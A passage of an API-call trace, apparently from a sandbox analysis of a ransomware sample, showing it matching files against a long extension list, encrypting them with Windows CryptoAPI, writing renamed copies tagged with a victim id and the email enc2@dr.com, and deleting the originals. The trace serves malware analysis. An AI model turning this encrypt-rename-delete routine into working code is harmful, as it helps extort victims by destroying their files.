hx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0175.858] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.858] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.858] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0175.859] ReadFile (in: hFile=0x390, lpBuffer=0xfde188, nNumberOfBytesToRead=0x6eb8, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfde188*, lpNumberOfBytesRead=0x18a640*=0x6eb8, lpOverlapped=0x0) returned 1
	[0175.864] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.864] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb5d8) returned 1
	[0175.866] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.866] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0175.866] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.866] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0175.866] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.867] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9070) returned 1
	[0175.867] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.867] CryptEncrypt (in: hKey=0xfb9070, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x6eb8, dwBufLen=0x6eb8 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x6ec0) returned 1
	[0175.867] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.868] RtlMoveMemory (in: Destination=0xfe5048, Source=0xfde188, Length=0x6eb8 | out: Destination=0xfe5048) 
	[0175.868] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.868] CryptEncrypt (in: hKey=0xfb9070, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe5048*, pdwDataLen=0x18a1ec*=0x6eb8, dwBufLen=0x6ec0 | out: pbData=0xfe5048*, pdwDataLen=0x18a1ec*=0x6ec0) returned 1
	[0175.869] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.869] CryptDestroyKey (hKey=0xfb9070) returned 1
	[0175.869] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.869] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0175.869] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.870] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0175.870] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.870] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.871] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.871] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0175.873] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 141
	[0175.873] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.873] WriteFile (in: hFile=0x39c, lpBuffer=0xfe5048*, nNumberOfBytesToWrite=0x6ec0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfe5048*, lpNumberOfBytesWritten=0x18a648*=0x6ec0, lpOverlapped=0x0) returned 1
	[0175.877] CloseHandle (hObject=0x39c) returned 1
	[0175.878] CloseHandle (hObject=0x390) returned 1
	[0175.878] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml")) returned 1
	[0175.882] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml")) returned 0
	[0175.882] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9fd4d57, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9fd4d57, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9fd4d57, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1
	[0175.882] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="..") returned 1
	[0175.882] lstrcmpW (lpString1="MasterDatastore.xml", lpString2=".") returned 1
	[0175.882] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\"
	[0175.882] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\", lpString2="MasterDatastore.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml"
	[0175.883] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml") returned 100
	[0175.883] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.883] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml", cchLength=0x64 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml") returned 0x64
	[0175.883] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.883] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0175.883] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml"
	[0175.883] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml") returned 100
	[0175.884] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.884] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.884] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0175.884] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.884] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0175.885] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.885] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.891] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0175.892] ReadFile (in: hFile=0x390, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x10f, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x18a640*=0x10f, lpOverlapped=0x0) returned 1
	[0175.895] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.895] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcae68) returned 1
	[0175.897] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.897] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0175.897] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.897] CryptHashData (hHash=0xfb8fb0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0175.898] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.898] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb8fb0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb92b0) returned 1
	[0175.898] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.898] CryptEncrypt (in: hKey=0xfb92b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x10f, dwBufLen=0x10f | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x110) returned 1
	[0175.898] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.898] RtlMoveMemory (in: Destination=0xfdc6a8, Source=0xfdcd58, Length=0x10f | out: Destination=0xfdc6a8) 
	[0175.898] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.899] CryptEncrypt (in: hKey=0xfb92b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x10f, dwBufLen=0x110 | out: pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x110) returned 1
	[0175.899] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.899] CryptDestroyKey (hKey=0xfb92b0) returned 1
	[0175.899] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.900] CryptDestroyHash (hHash=0xfb8fb0) returned 1
	[0175.900] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.900] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0175.900] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.900] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.902] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.902] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0175.903] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 142
